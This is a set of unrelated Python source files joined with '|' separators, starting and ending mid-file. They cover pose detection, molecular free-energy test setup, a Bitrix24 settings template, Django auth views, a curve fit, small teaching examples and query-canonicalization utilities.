            get_graph_path(self.tf_pose_type),
            target_size=self.target_size,
            trt_bool='F'
        )
        self.tf_pose_resize_out_ratio = resize_out_ratio

    def resize(self, image, target_size=(640, 480), method=cv2.INTER_NEAREST):
        """Resize `image` to `target_size` (width, height) with `method`."""
        return cv2.resize(
            image,
            target_size,
            interpolation=method
        )

    def __detect(self, image):
        """Run body-pose estimation and per-face head-pose regression.

        Returns:
            humans: tf-pose inference result for the whole image.
            face_rotation: dict mapping face index -> [yaw, pitch, roll].
        """
        w, h = model_wh(str(self.target_size[0])+'x'+str(self.target_size[1]))
        # tf-pose estimator detect
        humans = self.tf_pose.inference(
            image,
            resize_to_default=(w > 0 and h > 0),
            upsample_size=self.tf_pose_resize_out_ratio
        )
        # fsa-net detect
        # 1. face detect
        face_bb = self.face_d.get(image)
        # 2. yaw, pitch, roll detection with headpose
        face_rotation = {}
        for index, (x1, y1, x2, y2) in enumerate(face_bb):
            face_roi = image[y1:y2+1, x1:x2+1]
            # preprocess headpose model input: 64x64, HWC -> CHW, add batch
            # axis, scale to roughly [-1, 1].
            face_roi = cv2.resize(face_roi, (64, 64))
            face_roi = face_roi.transpose((2, 0, 1))
            face_roi = np.expand_dims(face_roi, axis=0)
            face_roi = (face_roi-127.5)/128
            face_roi = face_roi.astype(np.float32)
            # get headpose: average the two FSA-Net variants' outputs
            res1 = self.fsa_sess1.run(["output"], {"input": face_roi})[0]
            res2 = self.fsa_sess2.run(["output"], {"input": face_roi})[0]
            yaw, pitch, roll = np.mean(np.vstack((res1, res2)), axis=0)
            face_rotation.update({index: [yaw, pitch, roll]})
        return humans, face_rotation

    def detect(self, image):
        """Public wrapper around the private __detect pipeline."""
        return self.__detect(image)

    def draw(self, image, humans, face_rotation):
        """Overlay detected skeletons and one head-pose axis onto `image`.

        `face_rotation` here is a single [yaw, pitch, roll] triple (the
        __main__ block below passes face_rotation[0] from detect()).
        """
        image = TfPoseEstimator.draw_humans(
            image, humans,
            imgcopy=False
        )
        # NOTE(review): tdx uses image.shape[0] (height) as the x anchor;
        # image.shape[1] (width) may have been intended — confirm.
        image = draw_axis(
            image,
            face_rotation[0],
            face_rotation[1],
            face_rotation[2],
            tdx=image.shape[0], \
            # tdx=(x2-x1)//2+x1, \
            tdy=10, \
            # tdy=(y2-y1)//2+y1, \
            size=50
        )
        return image
if __name__ == "__main__":
    # Smoke test: run detection on one bundled sample image and write the
    # annotated result next to it.
    detection = Detector()
    image = cv2.imread(os.path.join('src', 'services',
                                    'detection', 'test', 'input', 'apink1.jpg'))
    image = detection.resize(image)
    humans, face_rotation = detection.detect(image)
    # Draw only the first detected human and the first face's angles.
    image = detection.draw(image, [humans[0]], face_rotation[0])
    cv2.imwrite(os.path.join('src', 'services', 'detection',
                             'test', 'output', 'apink1.jpg'), image)
|
#QUESTAO3
print("Funções recursivas são funções que chamam a si mesma de forma que, para resolver um problema maior, utiliza a recursão para chegar as unidades básicas do problema em questão e então calcular o resultado final.\n Exemplo:")
def fatorial(n):
    """Return n! (factorial of n), computed recursively.

    Accepts any integer n >= 0; both 0! and 1! are 1.
    """
    # Base case also guards n == 0 against infinite recursion.
    if n <= 1:
        return 1
    # BUG FIX: the previous version returned fatorial(n-1)*n - 1, which
    # yields fatorial(5) == 34 instead of 120.
    return fatorial(n - 1) * n

print(fatorial(5))
|
# construct a relative transformation
from importlib import resources
import numpy as np
from timemachine.fe.rbfe import setup_initial_states
from timemachine.fe.single_topology import SingleTopology
from timemachine.fe.utils import get_romol_conf, read_sdf
from timemachine.ff import Forcefield
def get_hif2a_ligand_pair_single_topology():
    """Return two ligands from hif2a and the manually specified atom mapping"""
    # Ligands at indices 1 and 4 of the bundled 40-ligand hif2a SDF.
    with resources.path("timemachine.testsystems.data", "ligands_40.sdf") as path_to_ligand:
        all_mols = read_sdf(str(path_to_ligand))
    mol_a = all_mols[1]
    mol_b = all_mols[4]
    # Hand-curated core: each row pairs an atom index in mol_a with the
    # corresponding atom index in mol_b.
    core = np.array(
        [
            [0, 0],
            [2, 2],
            [1, 1],
            [6, 6],
            [5, 5],
            [4, 4],
            [3, 3],
            [15, 16],
            [16, 17],
            [17, 18],
            [18, 19],
            [19, 20],
            [20, 21],
            [32, 30],
            [26, 25],
            [27, 26],
            [7, 7],
            [8, 8],
            [9, 9],
            [10, 10],
            [29, 11],
            [11, 12],
            [12, 13],
            [14, 15],
            [31, 29],
            [13, 14],
            [23, 24],
            [30, 28],
            [28, 27],
            [21, 22],
        ]
    )
    return mol_a, mol_b, core
def get_relative_hif2a_in_vacuum():
    """Build an initial vacuum RBFE state for the hif2a pair at lambda=0.5.

    Returns:
        Tuple of (potentials, sys_params, coords, masses) for the
        combined single-topology system.
    """
    mol_a, mol_b, core = get_hif2a_ligand_pair_single_topology()
    ff = Forcefield.load_default()
    rfe = SingleTopology(mol_a, mol_b, core, ff)
    temperature = 300  # Kelvin
    seed = 2022
    lam = 0.5  # single midpoint lambda window
    host = None  # vacuum
    initial_states = setup_initial_states(rfe, host, temperature, [lam], seed)
    potentials = initial_states[0].potentials
    # Extract the per-potential parameter arrays as float64.
    sys_params = [np.array(u.params, dtype=np.float64) for u in potentials]
    coords = rfe.combine_confs(get_romol_conf(mol_a), get_romol_conf(mol_b))
    masses = np.array(rfe.combine_masses())
    return potentials, sys_params, coords, masses
|
template = """<!DOCTYPE html>
<html>
<head>
<meta http-equiv="content-type" content="text/html; charset=utf-8">
<script>var token = "{{ token }}";</script>
<script src="//api.bitrix24.com/api/v1/"></script>
<script>
function runApplication (currentValues) {
currentValues = currentValues || {}
var form = document.querySelector('form'),
elements = form.elements,
initialized = false;
function getFormValues () {
return Array.prototype.map.call(elements, function (element) {
return [element.name, element.value];
}).reduce(function (result, item) {
result[item[0]] = item[1];
return result;
}, {});
}
function getVisibility () {
var autoCallOn = getFormValues().auto_call_on;
return {
employee_id: autoCallOn == 'employee',
scenario_id: autoCallOn == 'scenario',
virtual_number_numb: autoCallOn != 'virtual_number',
virtual_number: autoCallOn == 'virtual_number'
};
}
function saveSettings () {
if (!initialized) {
return;
}
var values = getFormValues();
Object.entries(getVisibility()).forEach(function (args) {
var name = args[0],
visibility = args[1];
!visibility && (values[name] = '');
});
BX24.placement.call('setPropertyValue', values);
}
function updateVisibility () {
Object.entries(getVisibility()).forEach(function (args) {
var name = args[0],
visibility = args[1];
document.querySelector('[name=' + name + ']').closest('div').style.display = visibility ? 'block' : 'none';
});
}
function request (args) {
var url = '/api/v1/' + args.url,
callback = args.callback || function () {},
request = new XMLHttpRequest();
request.addEventListener('load', function () {
var data;
try {
data = JSON.parse(this.responseText)
} catch (e) {
data = null;
}
callback((data || {}).data);
});
request.addEventListener('error', function () {
callback(null);
});
request.open('GET', url);
request.setRequestHeader('Authorization', 'Bearer ' + token);
request.send();
}
function createOption (args) {
var value = args.value,
text = args.text,
selected = args.selected;
return '<option ' + (selected ? 'selected ' : '') + 'value="' + value + '">' + text + '</option>';
}
[{
names: ['employee_id'],
dataUrl: 'users',
getText: function (record) {
return ['last_name', 'first_name'].map(function (name) {
return record[name];
}).filter(function (value) {
return value;
}).join(' ');
}
}, {
names: ['virtual_number_numb', 'virtual_number'],
dataUrl: 'number_capacity?with_scenario=1',
valueField: 'numb',
displayField: 'numb'
}, {
names: ['scenario_id'],
dataUrl: 'scenario',
displayField: 'name'
}].forEach(function (params) {
var names = params.names;
var selectFields = document.querySelectorAll(names.map(function (name) {
return 'select[name=' + name + ']'
}).join(','));
selectFields.forEach(function (selectField) {
selectField.disabled = true
});
function createOptions (data) {
var isEmpty = !data || !data.length;
selectFields.forEach(function (selectField) {
var options = isEmpty ? [createOption({
value: '',
text: '...'
})] : [];
(data || []).forEach(function (record) {
var value = record[params.valueField || 'id'];
options.push(createOption({
value: value,
text: params.getText ? params.getText(record) : record[params.displayField],
selected: currentValues[selectField.name] == value
}))
});
selectField.innerHTML = options.join('');
!isEmpty && (selectField.disabled = false);
});
saveSettings();
}
createOptions();
request({
url: params.dataUrl,
callback: createOptions
});
});
currentValues.employee_message && (document.querySelector('textarea').innerHTML = currentValues.employee_message);
const autoCallOnSelect = document.querySelector('select[name="auto_call_on"]');
autoCallOnSelect.addEventListener('change', updateVisibility);
autoCallOnSelect.value = currentValues.auto_call_on || 'personal_manager';
Array.prototype.forEach.call(elements, function (element) {
(element.nodeName.toLowerCase() == 'textarea' ? ['keyup', 'change'] : ['change']).forEach(function (eventName) {
element.addEventListener(eventName, saveSettings);
});
});
form.style.display = 'none';
BX24.init(function () {
initialized = true;
saveSettings();
form.style.display = 'block';
});
updateVisibility();
}
</script>
<style>
select, button {
height: 30px;
background: #fff;
border: 1px solid #000;
}
select[disabled], button[disabled] {
cursor: not-allowed;
color: #ccc;
}
select, textarea {
width: 100%;
box-sizing: border-box;
}
textarea {
height: 100px;
padding: 10px;
}
label {
margin-bottom: 15px;
display: block;
}
body {
padding: 20px;
}
body, textarea {
font-family: sans-serif;
font-size: 14px;
}
div {
margin-bottom: 25px;
}
</style>
<script>document.addEventListener("DOMContentLoaded", function () {runApplication({{ current_values|safe }});})</script>
</head>
<body>
<form>
<div>
<label>{{ properties.auto_call_on.NAME }}:</label>
<select name="auto_call_on">
{% for key, value in properties.auto_call_on.OPTIONS.items() %}
<option value="{{ key }}">{{ value }}</option>
{% endfor %}
</select>
</div>
<div>
<select name="employee_id"></select>
</div>
<div>
<select name="virtual_number"></select>
</div>
<div>
<select name="scenario_id"></select>
</div>
<div>
<label>{{ properties.virtual_number_numb.NAME }}:</label>
<select name="virtual_number_numb"></select>
</div>
<div>
<label>{{ properties.employee_message.NAME }}:</label>
<textarea name="employee_message"></textarea>
</div>
</form>
</body>
</html>
"""
|
"""
Graph State
===========
"""
from collections import defaultdict
import numpy as np
class _GraphState:
    """
    The topology graph of a molecule under construction.
    """

    __slots__ = [
        "_vertex_building_blocks",
        "_vertices",
        "_edges",
        "_lattice_constants",
        "_vertex_edges",
        "_num_building_blocks",
    ]

    def __init__(
        self,
        building_block_vertices,
        edges,
        lattice_constants,
    ):
        """
        Initialize a :class:`._GraphState` instance.

        Parameters
        ----------
        building_block_vertices : :class:`dict`
            Maps each :class:`.BuildingBlock` to be placed, to a
            :class:`tuple` of :class:`.Vertex` instances, on which
            it should be placed.

        edges : :class:`tuple` of :class:`.Edge`
            The edges which make up the topology graph.

        lattice_constants : :class:`tuple` of :class:`numpy.ndarray`
            A :class:`numpy.ndarray` for each lattice constant.
            Can be an empty :class:`tuple` if the topology graph is
            not periodic.

        """
        # Invert the mapping: vertex id -> building block placed there.
        self._vertex_building_blocks = {
            vertex.get_id(): building_block
            for building_block, vertices in building_block_vertices.items()
            for vertex in vertices
        }
        self._num_building_blocks = {
            building_block: len(vertices)
            for building_block, vertices in building_block_vertices.items()
        }
        self._vertices = {
            vertex.get_id(): vertex
            for vertices in building_block_vertices.values()
            for vertex in vertices
        }
        self._edges = edges
        # Copy the lattice constant arrays so callers cannot mutate state.
        self._lattice_constants = tuple(
            map(
                np.array,
                lattice_constants,
            )
        )
        self._vertex_edges = self._get_vertex_edges()

    def _get_vertex_edges(self):
        """
        Get the edges connected to each vertex.

        Returns
        -------
        :class:`dict`
            Maps the id of every vertex to a :class:`tuple` of
            :class:`.Edge` instances connected to it.

        """
        vertex_edges = defaultdict(list)
        for edge in self._edges:
            if edge.is_periodic():
                # Periodic edges get a per-vertex clone whose position is
                # shifted into the correct cell (see _get_periodic_edge).
                for vertex_id in edge.get_vertex_ids():
                    periodic_edge = self._get_periodic_edge(
                        edge=edge,
                        reference=vertex_id,
                    )
                    vertex_edges[vertex_id].append(periodic_edge)
            else:
                for vertex_id in edge.get_vertex_ids():
                    vertex_edges[vertex_id].append(edge)
        return vertex_edges

    def _get_periodic_edge(self, edge, reference):
        """
        Get an :class:`.Edge`, with its position correctly set.

        For a periodic edge, its correct position is not at the
        midpoint of the two vertices it connects. Instead, its
        correct position is different for each vertex. To get the
        correct position from the perspective of *vertex1*, *vertex2*
        must first be shifted to its periodic position, and only then
        can the midpoint of the vertices be used to get the edge
        position. An analogous calculation must be done to get the
        position of the edge from the perspective of *vertex2*.

        Parameters
        ----------
        edge : :class:`.Edge`
            The edge whose periodic position must be set.

        reference : :class:`int`
            The id of the vertex, relative to which the edge position
            is being calculated.

        Returns
        -------
        :class:`.Edge`
            A clone of `edge`, shifted to have the correct periodic
            position relative to `reference`.

        """
        vertex1 = self._vertices[reference]
        id1, id2 = edge.get_vertex_ids()
        vertex2 = self._vertices[id1 if reference == id2 else id2]
        # Periodicity is defined from id1 to id2; flip it when the
        # reference vertex is id2.
        direction = 1 if reference == id1 else -1
        periodicity = np.array(edge.get_periodicity())
        end_cell = vertex1.get_cell() + direction * periodicity
        cell_shift = end_cell - vertex2.get_cell()
        # Convert the cell offset to Cartesian via the lattice constants.
        shift = sum(
            axis_shift * constant
            for axis_shift, constant in zip(
                cell_shift,
                self._lattice_constants,
            )
        )
        position = (
            vertex2.get_position() + shift + vertex1.get_position()
        ) / 2
        return edge.with_position(position)

    def clone(self):
        """
        Get a clone.

        Returns
        -------
        :class:`._GraphState`
            The clone. Has the same type as the original instance.

        """
        clone = self.__class__.__new__(self.__class__)
        # Containers are copied shallowly; vertices/edges themselves are
        # shared with the original.
        clone._vertex_building_blocks = dict(
            self._vertex_building_blocks
        )
        clone._vertices = dict(self._vertices)
        clone._vertex_edges = dict(self._vertex_edges)
        clone._edges = self._edges
        clone._lattice_constants = tuple(
            map(
                np.array,
                self._lattice_constants,
            )
        )
        clone._num_building_blocks = dict(self._num_building_blocks)
        return clone

    def get_building_block(self, vertex_id):
        """
        Get the building block to be placed on a given vertex.

        Parameters
        ----------
        vertex_id : :class:`int`
            The id of the vertex, on which the building block is to
            be placed.

        Returns
        -------
        :class:`.BuildingBlock`
            The building block.

        """
        return self._vertex_building_blocks[vertex_id]

    def get_vertices(self, vertex_ids=None):
        """
        Yield the topology graph vertices.

        Parameters
        ----------
        vertex_ids : :class:`iterable` of :class:`int`, optional
            The ids of vertices to yield. If ``None``, all vertices
            will be yielded. Can be a single :class:`int` if a
            single vertex is to be yielded.

        Yields
        ------
        :class:`.Vertex`
            A vertex.

        """
        if vertex_ids is None:
            # NOTE(review): assumes vertex ids are the contiguous range
            # 0..N-1 — confirm this holds for all graph constructions.
            vertex_ids = range(len(self._vertices))
        elif isinstance(vertex_ids, int):
            vertex_ids = (vertex_ids,)
        for vertex_id in vertex_ids:
            yield self._vertices[vertex_id]

    def get_num_vertices(self):
        """
        Get the number of vertices in the topology graph.

        Returns
        -------
        :class:`int`
            The number of vertices in the topology graph.

        """
        return len(self._vertices)

    def get_edge(self, edge_id):
        """
        Get an edge.

        Parameters
        ----------
        edge_id : :class:`int`
            The id of an edge.

        Returns
        -------
        :class:`.Edge`
            An edge.

        """
        return self._edges[edge_id]

    def get_num_edges(self):
        """
        Get the number of edges in the topology graph.

        Returns
        -------
        :class:`int`
            The number of edges.

        """
        return len(self._edges)

    def get_lattice_constants(self):
        """
        Get the lattice constants of the state.

        Returns
        -------
        :class:`tuple` of :class:`numpy.ndarray`
            The lattice constants.

        """
        # Return fresh arrays so callers cannot mutate internal state.
        return tuple(map(np.array, self._lattice_constants))

    def get_edges(self, vertex_id):
        """
        Get the edges connected to a vertex.

        Parameters
        ----------
        vertex_id : :class:`int`
            The id of a vertex.

        Returns
        -------
        :class:`tuple` of :class:`.Edge`
            The connected edges.

        """
        return self._vertex_edges[vertex_id]

    def _with_vertices(self, vertices):
        """
        Modify the instance.

        """
        self._vertices = {
            vertex.get_id(): vertex for vertex in vertices
        }
        return self

    def with_vertices(self, vertices):
        """
        Returns a clone holding `vertices`.

        Parameters
        ----------
        vertices : :class:`iterable` of :class:`.Vertex`
            The vertices the clone should hold.

        Returns
        -------
        :class:`._GraphState`
            The clone. Has the same type as the original instance.

        """
        return self.clone()._with_vertices(vertices)

    def _with_lattice_constants(self, lattice_constants):
        """
        Modify the instance.

        """
        self._lattice_constants = tuple(
            map(
                np.array,
                lattice_constants,
            )
        )
        return self

    def with_lattice_constants(self, lattice_constants):
        """
        Return a clone holding the `lattice_constants`.

        Parameters
        ----------
        lattice_constants : :class:`tuple` of :class:`numpy.ndarray`
            The lattice constants of the clone. Requires 3 arrays of
            size ``(3, )``.

        Returns
        -------
        :class:`._GraphState`
            The clone holding the new lattice constants. Has the same
            type as the original instance.

        """
        return self.clone()._with_lattice_constants(lattice_constants)

    def get_num_building_block(self, building_block):
        """
        Get the number of times `building_block` is present.

        Parameters
        ----------
        building_block : :class:`.BuildingBlock`
            The building block whose frequency in the topology graph
            is desired.

        Returns
        -------
        :class:`int`
            The number of times `building_block` is present in the
            topology graph.

        """
        return self._num_building_blocks[building_block]

    def get_building_blocks(self):
        """
        Yield the building blocks.

        Building blocks are yielded in an order based on their
        position in the topology graph. For two equivalent
        topology graphs, but with different building blocks,
        equivalently positioned building blocks will be yielded at the
        same time.

        Yields
        ------
        :class:`.BuildingBlock`
            A building block of the topology graph.

        """
        yielded = set()
        # Iterate in vertex-id order so the yield order is positional.
        for vertex_id in range(max(self._vertex_building_blocks) + 1):
            building_block = self._vertex_building_blocks[vertex_id]
            if building_block not in yielded:
                yielded.add(building_block)
                yield building_block
|
from django.shortcuts import render
from .serializers import RegisterSerializer, LoginSerializer, UserSerializer
from rest_framework.generics import GenericAPIView
from rest_framework import status, permissions
from rest_framework.response import Response
from knox.models import AuthToken
from django.contrib.auth import get_user_model
class RegisterView(GenericAPIView):
    """Create a new user account from posted registration data."""
    serializer_class = RegisterSerializer

    def post(self, request):
        """Validate the payload, create the user, and echo it back."""
        serializer = self.serializer_class(data=request.data)
        if not serializer.is_valid():
            return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)
        user = serializer.save()
        return Response(self.serializer_class(user).data, status=status.HTTP_201_CREATED)
class LoginView(GenericAPIView):
    """Authenticate a user and hand back a knox token."""
    serializer_class = LoginSerializer

    def post(self, request):
        """Validate credentials; respond with the user and a fresh token."""
        serializer = self.serializer_class(data=request.data)
        if not serializer.is_valid():
            return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)
        user = serializer.validated_data
        payload = {
            'user': UserSerializer(user).data,
            'token': AuthToken.objects.create(user)[1],
        }
        return Response(payload, status=status.HTTP_200_OK)
class UserUpdateView(GenericAPIView):
    """Partially update the authenticated user's own profile."""
    serializer_class = UserSerializer
    permission_classes = [permissions.IsAuthenticated,]

    def put(self, request):
        """Apply a partial update to the requesting user's record."""
        instance = get_user_model().objects.get(pk=request.user.id)
        serializer = self.serializer_class(instance, data=request.data,
                                           partial=True)
        if not serializer.is_valid():
            return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)
        serializer.save()
        return Response(serializer.data, status=status.HTTP_200_OK)
|
from base.element_field import ElementField
from dataclasses import dataclass
@dataclass
class Water(ElementField):
    """Water tile element for the game field."""
    # NOTE(review): no type annotation, so under @dataclass this is a plain
    # class attribute shared by all instances, not a dataclass field.
    # NOTE(review): absolute user-specific path — not portable; consider a
    # project-relative path (verify against the asset-loading code).
    img = 'C:/Users/Данагуль/Desktop/текущее/ООЯ и С/game/image/water1.png'
|
# Copyright (c) 2020 by BionicDL Lab. All Rights Reserved.
# !/usr/bin/python
# -*- coding:utf-8 -*-
from setuptools import setup, find_packages
# Packaging metadata for the DeepClaw benchmark suite.
setup(
    name='DeepClaw',
    version='1.0.3',
    description=(
        'a reconfigurable benchmark of robotic hardware and task hierarchy for robot learning'
    ),
    author='BionicDL',
    author_email='sirgroup@outlook.com',
    maintainer='Haokun W., Fang W., Xiaobo L., Yanglin H.',
    maintainer_email='wanghk@mail.sustech.edu.cn',
    license='MIT License',
    packages=find_packages(),  # include every package under the repo root
    platforms=["all"],
    url='https://bionicdl-sustech.github.io/DeepClawBenchmark/',
    classifiers=[
        'Intended Audience :: Developers',
        'License :: OSI Approved :: MIT License',
        'Programming Language :: Python :: 3.7',
        'Programming Language :: Python :: 3.8',
        'Topic :: Software Development :: Libraries'
    ],
    # Mostly pinned versions: the benchmark was validated on this stack.
    install_requires=[
        'numpy==1.18.2',
        'matplotlib==3.2.1',
        'opencv_contrib_python==4.1.2.30',
        'PyYAML',
        'pyrealsense2==2.34.0.1470',
        'scipy==1.4.1',
        'tqdm==4.46.0'
    ],
)
|
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import seaborn as sns
sns.set()  # apply seaborn's default plot styling globally
import scipy.optimize
# Load the bicoid gradient measurements and shorten the column names.
df = pd.read_csv('data/bcd_gradient.csv', comment='#')
df = df.rename(columns={'fractional distance from anterior': 'x',
                        '[bcd] (a.u.)': 'I_bcd'})
# Raw data: intensity vs. fractional distance from the anterior.
plt.plot(df['x'], df['I_bcd'], marker='.', linestyle='none')
# define a function for modeling the gradient
# use a predefined function that the data should fit / that we are testing
def gradient_model(x, I_0, a, lam):
    """Bcd gradient model: exponential decay of amplitude I_0 and decay
    length lam on top of a constant background a."""
    # Reject non-positive positions and negative parameters up front.
    if np.any(np.array(x) <= 0):
        raise RuntimeError('x must be positive')
    params = np.array([I_0, a, lam])
    if np.any(params < 0):
        raise RuntimeError('all parameters must be positive')
    return a + I_0 * np.exp(-x / lam)
# runtime errors might arise if program starts to look at negative values
# even if given parameters are positive. It can wander off into regions
# that are not physically possible
# easy fix: use logs/exponentiation of the function - now won't get neg values
# Initial guesses read off the raw plot: background ~0.2, peak ~0.9.
a_guess = 0.2
I_0_guess = 0.9 - 0.2
lam_guess = 0.25
# construct an array of our guesses for the parameters
p0 = np.array([I_0_guess, a_guess, lam_guess])
# will output parameters as an array
popt, _ = scipy.optimize.curve_fit(gradient_model, df['x'], df['I_bcd'], p0=p0)
# split up parameters from an array into a tuple
# plot the parameters into a smooth line
x_smooth = np.linspace(0, 1, 200)
I_smooth = gradient_model(x_smooth, *tuple(popt))
plt.plot(x_smooth, I_smooth, color='gray')
|
# 静态方法,类方法
class TestClass:
    """Small demo contrasting @classmethod and @staticmethod."""

    @classmethod
    def clssMethod(cls):
        # cls gives access to class metadata such as __name__/__qualname__.
        msg = 'class name is {},full name is {}'.format(cls.__name__, cls.__qualname__)
        print(msg)

    @staticmethod
    def staticMethod():
        # No implicit first argument at all.
        print('this is static method')
def main():
    """Exercise both method kinds, then run a tiny tuple-swap demo."""
    TestClass.clssMethod()
    TestClass.staticMethod()
    a, b = 2, 3
    # Simultaneous assignment: a takes old b, b takes old a + b.
    a, b = b, a + b
    print(a)
    print(b)


if __name__ == '__main__':
    main()
|
# 给出一个完全二叉树,求出该树的节点个数。
#
# 说明:
#
# 完全二叉树的定义如下:在完全二叉树中,除了最底层节点可能没填满外,其余每层节点数都达到最大值,并且最下面一层的节点都集中在该层最左边的若干位置。若最底层为第 h 层,则该层包含 1~ 2h 个节点。
#
# 示例:
#
# 输入:
# 1
# / \
# 2 3
# / \ /
# 4 5 6
#
# 输出: 6
#
# 来源:力扣(LeetCode)
# 链接:https://leetcode-cn.com/problems/count-complete-tree-nodes
# 著作权归领扣网络所有。商业转载请联系官方授权,非商业转载请注明出处。
# Definition for a binary tree node.
class TreeNode:
    """Binary-tree node: a value plus left/right child links."""

    def __init__(self, x):
        self.val = x
        # Children start empty; callers wire them up afterwards.
        self.left = self.right = None
class Solution:
    """LeetCode 222: count the nodes of a complete binary tree.

    Uses the complete-tree property: descending along leftmost links gives
    the exact height, so at each level one subtree is provably perfect and
    its size can be computed in O(1), giving O(log^2 n) overall.
    """

    def countNodes(self, root: TreeNode) -> int:
        def height(node: TreeNode) -> int:
            # Height along the leftmost path; 0 for an empty subtree.
            h = 0
            while node:
                h += 1
                node = node.left
            return h

        if root is None:
            return 0
        left_h = height(root.left)
        right_h = height(root.right)
        if left_h == right_h:
            # Equal heights: the left subtree is perfect with 2**left_h - 1
            # nodes; recurse only into the right subtree.
            return (1 << left_h) + self.countNodes(root.right)
        if left_h > right_h:
            # Left is taller: the right subtree is perfect with height right_h.
            return (1 << right_h) + self.countNodes(root.left)
        # Unreachable for a valid complete tree (left height >= right height).
        return 1
|
from file_utils import file_contents
from pytokens import PYKEYWORDS
from type_simulation import TYPES
from nlparser import QueryParser
from type_simulation import guess_types, get_referencables
from canon_utils import fetch_queries_codes, parsable_code, reproducable_code, give_me_5
import ast
# import codegen
import re
import math
## Globals #####################################################################
ANNOT = "./gendata/all.anno"
CODE = "./gendata/all.code"
qparser = QueryParser()
## Utilities ###################################################################
# replace stuff in query that can be directly mapped
# replace stuff in query that can be directly mapped
def canonicalize_query_part1(q, ref_type):
    """First canonicalization pass: direct token/string mapping.

    ref_type maps literal tokens and quoted strings to type placeholders;
    longest keys are substituted first so shorter keys cannot clobber them.
    NOTE(review): the chained replace calls are deliberately
    whitespace-sensitive -- do not reorder or merge them.
    """
    # for every string in ref types, check if we have a match in query
    # (dict.keys() is never None, so the guard below is effectively dead code)
    keys_ordered = [] if ref_type.keys() is None else sorted(ref_type.keys(), key = (lambda x: len(str(x))), reverse = True)
    for k in keys_ordered:
        if ref_type[k].startswith(TYPES['str']):
            # double quoted
            q = q.replace(" \"" + k + "\" ", " " + ref_type[k] + " ")
            q = q.replace("\"" + k + "\" ", " " + ref_type[k] + " ")
            q = q.replace(" \"" + k + "\"", " " + ref_type[k] + " ")
            # single quoted
            q = q.replace(" \'" + k + "\' ", " " + ref_type[k] + " ")
            q = q.replace("\'" + k + "\' ", " " + ref_type[k] + " ")
            q = q.replace(" \'" + k + "\'", " " + ref_type[k] + " ")
    # represent "class . attribute" as class.attribute
    # modify direct mapping: swap every non-keyword token that has a mapping
    tokens = []
    for t in q.split(" "):
        if t not in PYKEYWORDS and ref_type.get(t.strip()) is not None:
            tokens.append(ref_type[t.strip()])
        else:
            tokens.append(t)
    q = " ".join(tokens)
    # represent "class.attribute" as "class . attribute"
    q = re.sub(r'([a-zA-Z])\.([a-zA-Z])', r'\1 . \2', q)
    # modify direct mapping again, now that dotted names are split into tokens
    tokens = []
    for t in q.split(" "):
        if t not in PYKEYWORDS and ref_type.get(t.strip()) is not None:
            tokens.append(ref_type[t.strip()])
        else:
            tokens.append(t)
    # new query
    q = " ".join(tokens)
    return q
# replace stuff in query based on pos tag of each token
# replace stuff in query based on pos tag of each token
def canonicalize_query_part2(q_pos, ref_type):
    """Second canonicalization pass, driven by POS tags.

    q_pos is a sequence of (token, pos) pairs. Tokens in closed word classes
    (prepositions, determiners, conjunctions, pronouns) are kept verbatim;
    any other token is replaced by its ref_type entry when one exists --
    string key first, then an integer key for digit-only tokens.
    """
    closed_class = {"IN", "DT", "PDT", "WDT", "CC", "PRP", "PRP$", "WP", "WP$"}

    def mapped(tok):
        # Prefer a direct string-keyed mapping, then an int-keyed one.
        stripped = tok.strip()
        if ref_type.get(stripped) is not None:
            return ref_type[stripped]
        if tok.isdigit() and ref_type.get(int(tok)) is not None:
            return ref_type[int(tok)]
        return tok

    out = []
    for tok, tag in q_pos:
        out.append(tok if tag in closed_class else mapped(tok))
    return " ".join(out)
def canonicalize_code(code, ref_type):
    """Rewrite identifiers/attributes/strings/numbers in `code` to their
    ref_type placeholders; return "" when the code cannot be round-tripped.

    NOTE(review): `codegen` is only referenced by a commented-out import at
    the top of this module. If it really is absent at runtime, the round-trip
    check below raises NameError, the bare except catches it, and this
    function returns "" for every input -- confirm against the deployed env.
    """
    try:
        # Reject code that cannot survive a parse -> unparse -> parse cycle.
        ast.parse(codegen.to_source(ast.fix_missing_locations(ast.parse(code.strip()))))
    except:
        return ""
    # replace all identifiers in the code by TYPES as guessed
    # parse code
    root = ast.parse(code)
    # walk the ast; each try/except probes for a node attribute that only
    # some node types have, and silently skips the rest
    for node in ast.walk(root):
        # fix all identifiers
        try:
            # modify identifier with type
            if ref_type.get(node.id) is not None:
                node.id = ref_type[node.id]
        except:
            pass
        ## fix all attributes
        try:
            if ref_type.get(node.attr) is not None:
                node.attr = ref_type[node.attr]
        except:
            pass
        #3 fix all strings
        try:
            if isinstance(node, ast.Str):
                if ref_type.get(node.s) is not None:
                    node.s = ref_type[node.s]
        except:
            pass
        # fix all numbers
        try:
            if isinstance(node, ast.Num):
                if ref_type.get(node.n) is not None:
                    node.n = ref_type[node.n]
        except:
            pass
        # fix all alias
        try:
            if isinstance(node, ast.alias):
                if ref_type.get(node.name) is not None:
                    node.name = ref_type[node.name]
        except:
            pass
        # fix all function definitions
        try:
            if isinstance(node, ast.FunctionDef):
                if ref_type.get(node.name) is not None:
                    node.name = ref_type[node.name]
        except:
            pass
        # fix all class definitions
        try:
            if isinstance(node, ast.ClassDef):
                if ref_type.get(node.name) is not None:
                    node.name = ref_type[node.name]
        except:
            pass
        # fix all kword definitions
        try:
            if isinstance(node, ast.keyword):
                if ref_type.get(node.arg) is not None:
                    node.arg = ref_type[node.arg]
        except:
            pass
    # looks like codegen is bugggy !! hence the patchwork
    try:
        # can we parse and unparse the code ??
        ast.parse(codegen.to_source(ast.fix_missing_locations(root)))
        code = codegen.to_source(ast.fix_missing_locations(root))
        # code gen does a pretty bad job at generating code :@
        # it generated - raiseFUNC('STR' % ANY)
        # while it should be, raise FUNC('STR' % ANY)
        # make a space in code when such things happen
        for t in TYPES.values():
            code = re.sub(r'([a-zA-Z]+)' + t, r'\1' + " " + t, code)
        # check if we can parse it
        ast.parse(codegen.to_source(ast.fix_missing_locations(root)))
        return code
    except:
        return ""
def batch_deep_phrases(queries):
    """Run qparser.deep_phrases over `queries` in up to 18 batches.

    Python 2 code: relies on the print statement and on filter() returning
    a list (parts.index below needs a list).
    """
    # Batch size: ceil(len/18) so at most 18 slices cover everything.
    n = math.ceil(float(len(queries)) / 18.0)
    n = int(n)
    parts = [ queries[x * n : (x + 1) * n] for x in range(18) ]
    # remove empty parts
    parts = filter(lambda part: part != [], parts)
